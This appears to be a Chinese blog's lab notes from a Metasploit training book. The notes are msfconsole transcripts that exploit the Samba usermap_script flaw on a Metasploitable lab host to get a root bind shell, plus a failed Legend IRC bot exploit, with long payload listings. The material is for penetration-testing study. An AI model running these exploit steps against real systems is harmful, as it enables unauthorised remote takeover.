《Metasploit 魔鬼训练营》01 初识 Metasploit
2017-08-23 12:58
609 查看
1 . 使用 msf 图形化工具 armitage
2 . 使用 msfconsole 控制台利用 samba 漏洞获取控制权
msf > help search
msf > search samba
msf > use multi/samba/usermap_script
msf exploit(usermap_script) > show payloads
msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(usermap_script) > show options
msf exploit(usermap_script) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(usermap_script) >
msf exploit(usermap_script) > exploit
3 . 使用 msfconsole 控制台利用 VNC 漏洞获取控制权
msf > search vnc
msf > use multi/misc/legend_bot_exec
msf exploit(legend_bot_exec) > show payloads
msf exploit(legend_bot_exec) > set payloads cmd/unix/bind_awk
payloads => cmd/unix/bind_awk
msf exploit(legend_bot_exec) > show options
msf exploit(legend_bot_exec) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(legend_bot_exec) > exploit
4 . 总结过程
从 armitage 菜单项中选择 exploits --> multi --> samba --> usermap_script 将显示对话渗透攻击模块进行参数配置的对话框,填写 RHOST 即可开始 完成后可以输入 uname -a 或者 whoami 进行检验
2 . 使用 msfconsole 控制台利用 samba 漏洞获取控制权
root@kali:~# msfconsole
msf > help search
Usage: search [keywords] Keywords: app : Modules that are client or server attacks author : Modules written by this author bid : Modules with a matching Bugtraq ID cve : Modules with a matching CVE ID edb : Modules with a matching Exploit-DB ID name : Modules with a matching descriptive name platform : Modules affecting this platform ref : Modules with a matching ref type : Modules of a specific type (exploit, auxiliary, or post) Examples: search cve:2009 type:exploit app:client
msf > search samba
Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow auxiliary/scanner/rsync/modules_list normal List Rsync Modules auxiliary/scanner/smb/smb_uninit_cred normal Samba _netr_ServerPasswordSet Uninitialized Credential State exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86) exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86) exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86) exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC) exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC) exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution exploit/ 12d2a unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent MS14-060 Microsoft Windows OLE Package Manager Code Execution exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow exploit/windows/smb/group_policy_startup 2015-01-26 manual Group Policy Script Execution From Shared Resource post/linux/gather/enum_configs normal Linux Gather Configurations
msf > use multi/samba/usermap_script
msf exploit(usermap_script) > show payloads
Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK) cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd) cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua) cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat) cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e) cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6 cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby) cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6 cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh) cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) cmd/unix/reverse_awk normal Unix Command Shell, Reverse TCP (via AWK) cmd/unix/reverse_lua normal Unix Command Shell, Reverse TCP (via Lua) cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat) cmd/unix/reverse_netcat_gaping normal Unix Command Shell, Reverse TCP (via netcat -e) cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl) cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl) cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl) cmd/unix/reverse_php_ssl normal Unix Command Shell, Reverse TCP SSL (via php) cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python) cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python) cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby) cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby) cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)
msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port (TCP) Payload options (cmd/unix/bind_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 4444 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Automatic
msf exploit(usermap_script) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(usermap_script) >
msf exploit(usermap_script) > exploit
[*] Started bind handler [*] Command shell session 1 opened (172.16.0.132:32807 -> 172.16.0.135:4444) at 2017-08-16 08:27:37 -0400 uname -a Linux www.metasploitable.tst 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux whoami root
3 . 使用 msfconsole 控制台利用 VNC 漏洞获取控制权
msf > search vnc
Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/vnc/realvnc_41_bypass 2006-05-15 normal RealVNC NULL Authentication Mode Bypass auxiliary/scanner/vnc/vnc_login normal VNC Authentication Scanner auxiliary/scanner/vnc/vnc_none_auth normal VNC Authentication None Detection auxiliary/server/capture/vnc normal Authentication Capture: VNC exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Legend Perl IRC Bot Remote Code Execution exploit/multi/vnc/vnc_keyboard_exec 2015-07-10 great VNC Keyboard Remote Code Execution exploit/windows/vnc/realvnc_client 2001-01-29 normal RealVNC 3.3.7 Client Buffer Overflow exploit/windows/vnc/ultravnc_client 2006-04-04 normal UltraVNC 1.0.1 Client Buffer Overflow exploit/windows/vnc/ultravnc_viewer_bof 2008-02-06 normal UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow exploit/windows/vnc/winvnc_http_get 2001-01-29 average WinVNC Web Server GET Overflow payload/windows/vncinject/bind_hidden_ipknock_tcp normal VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager payload/windows/vncinject/bind_hidden_tcp normal VNC Server (Reflective Injection), Hidden Bind TCP Stager payload/windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) payload/windows/vncinject/bind_ipv6_tcp_uuid normal VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) payload/windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7) payload/windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (Windows x86) payload/windows/vncinject/bind_tcp_rc4 normal VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) payload/windows/vncinject/bind_tcp_uuid normal VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) payload/windows/vncinject/find_tag normal VNC Server (Reflective Injection), Find Tag Ordinal Stager payload/windows/vncinject/reverse_hop_http normal VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager payload/windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet) payload/windows/vncinject/reverse_http_proxy_pstore normal VNC Server (Reflective Injection), Reverse HTTP Stager Proxy payload/windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6) payload/windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7) payload/windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) payload/windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager payload/windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager payload/windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS) payload/windows/vncinject/reverse_tcp_rc4 normal VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) payload/windows/vncinject/reverse_tcp_rc4_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) payload/windows/vncinject/reverse_tcp_uuid normal VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support payload/windows/vncinject/reverse_winhttp normal VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp) payload/windows/x64/vncinject/bind_ipv6_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support payload/windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager payload/windows/x64/vncinject/bind_tcp_uuid normal Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64) payload/windows/x64/vncinject/reverse_http normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) payload/windows/x64/vncinject/reverse_https normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) payload/windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager payload/windows/x64/vncinject/reverse_tcp_uuid normal Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64) payload/windows/x64/vncinject/reverse_winhttp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp) payload/windows/x64/vncinject/reverse_winhttps normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp) post/multi/gather/remmina_creds normal UNIX Gather Remmina Credentials post/osx/gather/enum_chicken_vnc_profile normal OS X Gather Chicken of the VNC Profile post/windows/gather/credentials/mremote normal Windows Gather mRemote Saved Password Extraction post/windows/gather/credentials/vnc normal Windows Gather VNC Password Extraction
msf > use multi/misc/legend_bot_exec
msf exploit(legend_bot_exec) > show payloads
Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK) cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua) cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat) cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e) cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6 cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby) cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6 cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh) cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) cmd/unix/reverse_awk normal Unix Command Shell, Reverse TCP (via AWK) cmd/unix/reverse_lua normal Unix Command Shell, Reverse TCP (via Lua) cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat) cmd/unix/reverse_netcat_gaping normal Unix Command Shell, Reverse TCP (via netcat -e) cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl) cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl) cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl) cmd/unix/reverse_php_ssl normal Unix Command Shell, Reverse TCP SSL (via php) cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python) cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby) cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby) cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh) cmd/windows/adduser normal Windows Execute net user /ADD CMD cmd/windows/bind_lua normal Windows Command Shell, Bind TCP (via Lua) cmd/windows/bind_perl normal Windows Command Shell, Bind TCP (via Perl) cmd/windows/bind_perl_ipv6 normal Windows Command Shell, Bind TCP (via perl) IPv6 cmd/windows/bind_ruby normal Windows Command Shell, Bind TCP (via Ruby) cmd/windows/download_eval_vbs normal Windows Executable Download and Evaluate VBS cmd/windows/download_exec_vbs normal Windows Executable Download and Execute (via .vbs) cmd/windows/generic normal Windows Command, Generic Command Execution cmd/windows/reverse_lua normal Windows Command Shell, Reverse TCP (via Lua) cmd/windows/reverse_perl normal Windows Command, Double Reverse TCP Connection (via Perl) cmd/windows/reverse_ruby normal Windows Command Shell, Reverse TCP (via Ruby)
msf exploit(legend_bot_exec) > set payloads cmd/unix/bind_awk
payloads => cmd/unix/bind_awk
msf exploit(legend_bot_exec) > show options
Module options (exploit/multi/misc/legend_bot_exec): Name Current Setting Required Description ---- --------------- -------- ----------- CHANNEL #channel yes IRC Channel IRC_PASSWORD no IRC Connection Password NICK msf_user yes IRC Nickname RHOST yes The target address RPORT 6667 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Legend IRC Bot
msf exploit(legend_bot_exec) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(legend_bot_exec) > exploit
[*] Started reverse TCP double handler on 172.16.0.132:4444 [*] 172.16.0.135:6667 - 172.16.0.135:6667 - Registering with the IRC Server... [*] 172.16.0.135:6667 - 172.16.0.135:6667 - Joining the #channel channel... [*] 172.16.0.135:6667 - 172.16.0.135:6667 - Exploiting the malicious IRC bot... [*] Exploit completed, but no session was created. 实验未成功
4 . 总结过程
以 VNC 为例: msf > search vnc msf > use multi/misc/legend_bot_exec msf exploit(legend_bot_exec) > show payloads msf exploit(legend_bot_exec) > set payloads cmd/unix/bind_awk payloads => cmd/unix/bind_awk msf exploit(legend_bot_exec) > show options msf exploit(legend_bot_exec) > set RHOST 172.16.0.135 RHOST => 172.16.0.135 msf exploit(legend_bot_exec) > exploit
相关文章推荐
- 初识Spring_01
- 一天搞定CSS:初识css--01
- 《Metasploit 魔鬼训练营》08 移动环境渗透测试
- iOS_SpriteKit_01_初识SpriteKit
- 正则表达式-01 初识
- 简话Angular 01 初识Angular 数据绑定
- Flask01 初识flask、创建flask应用、flask启动配置
- 从0开始学习 GitHub 系列之「01.初识 GitHub」----转载自stormzhang 原创文章
- reactJS - 01初识
- [置顶] 《Metasploit 魔鬼训练营》博客目录
- 《Metasploit 魔鬼训练营》03 情报搜集技术
- 01-Shiro初识
- 01 初识STRUTS2
- Spring Boot基础 - 初识 - 01
- 初识springmvc_01
- 黑马程序员 01 初识Java
- Kubernetes 笔记 01 初识 Kubernetes 新时代的领航者
- 初识设计模式 chapter 01-策略模式
- 《Metasploit 魔鬼训练营》02 渗透测试实验环境
- Flask01 初识flask、创建flask应用、flask启动配置